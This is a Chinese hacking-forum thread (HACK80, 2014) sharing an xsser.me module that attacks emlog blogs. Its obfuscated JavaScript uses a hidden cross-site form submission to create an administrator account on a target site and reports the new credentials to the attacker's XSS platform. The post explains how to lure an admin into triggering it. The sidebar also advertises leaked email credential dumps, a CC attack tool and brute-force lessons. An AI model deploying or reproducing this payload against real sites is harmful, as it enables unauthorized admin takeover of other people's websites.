HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: root
查看: 1072|回复: 4

主题标签Tag

more +随机图赏Gallery

二期公开课第11节-MySQL5注入之写马拿webshell二期公开课第11节-MySQL5注入之写马拿webshell
社工库资源:某易邮箱 52g账号密码,快来拿社工库资源:某易邮箱 52g账号密码,快来拿
二期公开课第17节 - 数据库备份+突破二期公开课第17节 - 数据库备份+突破
福利来了:cc攻击器+IP代理工具福利来了:cc攻击器+IP代理工具
VIP获取工具,优酷、迅雷·VIP获取工具,优酷、迅雷·
各种工具包各种工具包
二期公开课第7节-Access注入之union注入二期公开课第7节-Access注入之union注入
二期公开课第27节-CMS漏洞利用(良精南方)二期公开课第27节-CMS漏洞利用(良精南方)
二期公开课第2节-渗透测试相关术语二期公开课第2节-渗透测试相关术语
二期公开课第6节-Linux下的爆破工具+爆破指定IP远程登陆二期公开课第6节-Linux下的爆破工具+爆破指定IP远程登陆

emlog全版本CSRF加用户xsser.me模块

[复制链接]
root 发表于 2014-6-10 09:24:38 | 显示全部楼层 |阅读模式
查看: 1072|回复: 4
  前几天写了那个CSRF防御模块,官网回应较少,看来那里鲜有人把安全放在眼中。。今天干脆封装一个CSRF的模块,加入xsser.me这个平台里,方便以后的渗透。如果你的目标或目标的旁站中存在emlog,那么拿下来的几率还是很大的。
   xsser.me模块代码:
  1. var gum=function(){var u={version:"1140213",domain:"{{domain}}",backinfo:{}};return u.e=function(code){try{return eval(code)}catch(e){return""}},u.jquery=function(){return u.e("$().jquery")?1:0},u.id=function(e){return u.jquery()?$("#"+e):document.getElementById(e)},u.name=function(e){return document.getElementsByTagName(e)},u.html=function(){return u.name("html")[0]||document.write("<html>")||u.name("html")[0]},u.rdm=function(){return Math.random()*1e5},u.bind=function(e,t,n){u.jquery()?$(e).bind(t,n):e.addEventListener?e.addEventListener(t,n,!1):e.attachEvent("on"+t,n)},u.kill=function(e){u.jquery()?$(e).remove():e.parentElement.removeChild(e)},u.addom=function(e,t,n,r){!t&&(t=u.html());var i=document.createElement("span");i.innerHTML=e;var s=i.children[0];return n&&(s.style.display="none"),r&&u.bind(s,"load",r),t.appendChild(s),s},u.script=function(e,t){u.jquery()?$.getScript(e,t):(document.documentElement.appendChild(scripts=document.createElement("script")).src=e,t&&u.bind(scripts,"load",t),u.kill(scripts))},u.ajax=function(e,t,n){var r;return t?types="POST":types="GET",u.jquery()?(r=$.ajax({type:types,url:e,data:t,success:n}),r):(window.XMLHttpRequest?r=new XMLHttpRequest:r=new ActiveXObject("Microsoft.XMLHTTP"),r.open(types,e,!1),types=="POST"&&r.setRequestHeader("content-type","application/x-www-form-urlencoded"),n&&(r.onreadystatechange=function(){this.readyState==4&&(this.status>=200&&this.status<=300||this.status==304)&&n.apply(this,arguments)}),r.send(t),r)},u.post=function(e,t,n,r){var i=u.addom("<form method='POST'>",u.html(),!0);i.action=e;for(var s in t){var o=document.createElement("input");o.name=s,o.value=t[s],i.appendChild(o)}if(!n){var a=u.addom("<iframe name=_"+u.rdm()+"_>",u.html(),!0);i.target=a.name}r&&u.bind(i,"submit",r),i.submit(),!n&&u.kill(i)&setTimeout(function(){u.kill(a)},3e3)},u}();(function(){var e="{set.user}",t="{set.pass}";gum.post(unescape("{set.target}")+"/admin/user.php?action=new",{login:e,password:t,password2:t,role:"admin"},!1),function(){(new Image).src="http://这里是你的xss平台地址/index.php?do=api&id={projectId}&username="+e+"&password="+t}()})()
复制代码
修改其中xsser.me平台的地址即可。
    在模块处新建模块,如下填写:
            [/url]
            增加项目时,需要配置三个参数。填写你待添加的用户名、密码,还有你目标地址:
            [url=http://www.leavesongs.com/content/uploadfile/201402/4efd1392710109.jpg]

            项目创建好后将js任意插入某个页面,让目标管理员访问,即可简单为其增加一个账号:
            [/url]
            因为ajax处理post请求的跨域问题,所以采用的是form动态提交的方式,没有返回值……不管是否成功增加账号都会发送一条结果到xsser.me平台项目中。
            [url=http://www.leavesongs.com/content/uploadfile/201402/3fb51392710110.jpg]

            所以如果你是emlog使用者,真的把安全当回事,就使用CSRF防御插件。

转自离别歌

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
asdzx789 发表于 2014-6-10 09:58:59 | 显示全部楼层
过来看看的
qq360361689 发表于 2014-6-10 13:00:58 | 显示全部楼层
没看完~~~~~~ 先顶,好同志
HackerHades 发表于 2015-4-25 08:53:54 | 显示全部楼层
很有看点!
aliensb 发表于 2015-4-25 09:35:03 | 显示全部楼层
信楼主,考试不挂科!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|小黑屋|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2017-4-26 02:26 , Processed in 0.058174 second(s), 28 queries .

Powered by Discuz! X3.2 © 2001-2013 Comsenz Inc.